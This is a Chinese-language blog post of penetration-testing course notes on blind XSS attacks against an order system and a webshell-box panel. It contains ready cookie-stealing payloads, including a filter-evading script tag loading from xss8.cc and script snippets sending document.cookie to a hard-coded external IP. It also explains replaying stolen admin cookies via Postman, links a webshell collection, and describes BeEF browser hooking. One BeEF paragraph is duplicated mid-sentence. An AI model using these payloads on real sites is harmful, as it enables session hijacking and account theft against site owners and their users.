第26天xss注入之订单及shell箱子反杀记

Posted 2024-11-14 Updated 2025-08- 17

By Administrator

3~5 min read

https://xss8.cc/

https://www.postman.com/downloads/

https://github.com/tennc/webshell

https://pan.baidu.com/s/13H4N1VTBVwd3t8YWpECBFw 提取码xiao

演示案例：

某营销订单系统XSS盲打平台

思路：用xss获取cookie，用cookie访问网站（身份盗用）

document.cookie，获取cookie的函数

</tExtArEa>'"><sCRiPt sRC=http://xss8.cc/q5v5></sCrIpT> #获取cookie

echo"<script>
window.open('http://39.96.44.170/jieshou.php?c='+document.cookie);
</script>";

<script src="http://39.96.44.170/jieshou.php?c="+document.cookie></script>

postman的使用（获取管理员cookie访问后台）

某Shell箱子系统XSS盲打_工具

看脚本有没有后门直接抓包

BEFF

BeEF，全称 The Browser Exploitation Framework（浏览器漏洞利用框架），是一个专门用于测试和利用Web浏览器安全漏洞的渗透测试工具。它可以帮助安全研究人员评估目标环境的安全性，特别是通过客户端攻击向量进行的攻击

BeEF的核心功能是能够“钩住”（hook）一个或多个Web浏览器，并使用这些浏览器作为攻击的跳板，对系统进行更深入的攻击和控制。它通常用于信息收集、网络钓鱼、会话劫持等的核心功能是能够“钩住”（hook）一个或多个Web浏览器，并使用这些浏览器作为攻击的跳板，对系统进行更深入的攻击和控制。它通常用于信息收集、网络钓鱼、会话劫持等

小迪安全web

License: CC BY 4.0